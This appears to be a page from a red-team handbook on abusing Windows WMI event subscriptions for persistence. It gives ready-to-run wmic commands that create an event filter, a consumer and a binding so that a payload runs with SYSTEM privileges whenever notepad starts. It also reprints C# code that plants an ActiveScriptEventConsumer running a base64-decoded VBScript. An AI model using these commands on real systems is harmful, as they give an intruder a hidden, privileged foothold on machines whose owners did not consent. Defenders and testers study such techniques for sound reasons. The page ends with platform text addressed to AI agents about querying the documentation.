> For the complete documentation index, see [llms.txt](https://kwcsec.gitbook.io/the-red-team-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kwcsec.gitbook.io/the-red-team-handbook/techniques/persistence/admin-level/wmi-event-subscriptions.md). # WMI Event Subscriptions WMI Event subscriptions can be abused for persistence with payloads that will run with SYSTEM privileges. WMI eventing can be used on action to almost any system event, this includes: logins, registry, file activity etc. There are 3 things to remember about WMI 1. EventFilter: Action that triggers the payload 2. EventConsumer: Where the payload will be stored • 3. FilterToConsumerBinding: Binds the “EventFilter” and “EventConsumer” This can be done with the wmic utility: ``` wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="INFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="Select * From __InstanceCreationEvent Within 15 Where (TargetInstance Isa 'Win32_Process' And TargetInstance.Name = 'notepad.exe')" ``` The above command will kickoff if there is a instance of x32 notepad.exe in memory. ``` wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="NAME", ExecutablePath="C:\Windows\System32\calc.exe",CommandLineTemplate="C:\Windows\System32\calc.exe" ``` The above command is what to run if notepad.exe is executed. ``` wmic /NAMESPACE:"\root\subscription" PATH FilterToConsumerBinding CREATE Filter="EventFilter.Name=\"INFilter\"", Consumer="CommandLineEventConsumer.Name=\"NAME\"" ``` The above command will bind the “EventFilter” and “EventConsumer” which will achieve persistence everytime an instance of a x32 notepad is executed. If we run x32 notepad, we will see an instance of calc being ran with SYSTEM privileges. We can also implement this in other languages like C#(stolen from mdsec) ``` // COMPLETELY STOLEN FROM HERE: https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs ``` ``` using System; using System.Text; using System.Management; namespace WMIPersistence { class Program { static void Main(string[] args) { PersistWMI(); } static void PersistWMI() { ManagementObject myEventFilter = null; ManagementObject myEventConsumer = null; ManagementObject myBinder = null; string vbscript64 = ""; string vbscript = Encoding.UTF8.GetString(Convert.FromBase64String(vbscript64)); try { ManagementScope scope = new ManagementScope(@"\\.\root\subscription"); ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null); String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " + "WHERE TargetInstance ISA \"Win32_Process\" " + "AND TargetInstance.Name = \"notepad.exe\""; WqlEventQuery myEventQuery = new WqlEventQuery(strQuery); myEventFilter = wmiEventFilter.CreateInstance(); myEventFilter["Name"] = "demoEventFilter"; myEventFilter["Query"] = myEventQuery.QueryString; myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage; myEventFilter["EventNameSpace"] = @"\root\cimv2"; myEventFilter.Put(); Console.WriteLine("[*] Event filter created."); myEventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance(); myEventConsumer["Name"] = "BadActiveScriptEventConsumer"; myEventConsumer["ScriptingEngine"] = "VBScript"; myEventConsumer["ScriptText"] = vbscript; myEventConsumer.Put(); Console.WriteLine("[*] Event consumer created."); myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance(); myBinder["Filter"] = myEventFilter.Path.RelativePath; myBinder["Consumer"] = myEventConsumer.Path.RelativePath; myBinder.Put(); Console.WriteLine("[*] Subscription created"); } catch (Exception e) { Console.WriteLine(e); } // END CATCH Console.ReadKey(); } // END FUNC } // END CLASS } // END NAMESPACE ``` ## Resources {% embed url="" %} {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/persistence/admin-level/wmi-event-subscriptions.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.